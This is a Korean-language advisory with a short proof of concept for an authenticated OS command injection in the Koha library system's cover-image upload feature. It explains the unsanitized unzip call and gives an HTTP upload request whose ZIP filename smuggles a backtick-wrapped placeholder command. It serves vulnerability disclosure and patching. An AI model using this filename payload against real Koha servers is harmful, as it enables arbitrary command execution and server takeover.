
CVE-2024-36057에 대한 권고 및 개념 증명으로, Koha 도서관 소프트웨어의 인증된 OS 명령 주입 취약점으로, 조작된 ZIP 파일 이름을 통한 임의 명령 실행을 시연합니다.
CVE ID: CVE-2024-36057
제품: Koha 도서관 소프트웨어
취약점 유형: OS 명령 주입 (CWE-78)
CVSS 점수: 8.7 (높음) 인증 필요
영향을 받는 버전: 22.05.22 미만
공로: Karolis Narvilas
Koha는 오픈소스 통합 도서관 시스템입니다. tools/upload-cover-image.pl의 표지 이미지 업로드 기능에 명령 주입 취약점이 존재합니다. 애플리케이션은 qx/unzip $filename -d $dirname/를 사용하여 업로드된 ZIP 아카이브를 추출하는데, 파일 이름 매개변수를 검증하지 않습니다.
인증된 고권한 사용자는 백틱 문자를 포함한 악성 파일 이름으로 ZIP 파일을 제작하여 임의의 셸 명령을 주입할 수 있으며, 사용자가 "이미지 처리"를 클릭하면 서버 측에서 해당 명령이 실행됩니다.
영향: 원격 인증 공격자는 CVE-2024-36057을 악용하여 기본 서버에서 임의의 OS 명령을 실행할 수 있으며, 이로 인해 전체 시스템 손상, 데이터 유출, 지속적인 백도어 또는 리버스 셸 구축이 가능해집니다.
https://{domain}/cgi-bin/koha/tools/upload-cover-image.pl요청:
POST /cgi-bin/koha/tools/upload-file.pl?temp=1 HTTP/1.1
Host: {domain}
Cookie: [High-Privilege Session]
Connection: close
------WebKitFormBoundaryP82Da5V6eaQOuBUT
Content-Disposition: form-data; name="file"; filename="execute`<INJECTED_COMMAND>`.zip"
Content-Type: application/x-zip-compressed
<zip file contents>
------WebKitFormBoundaryP82Da5V6eaQOuBUT--
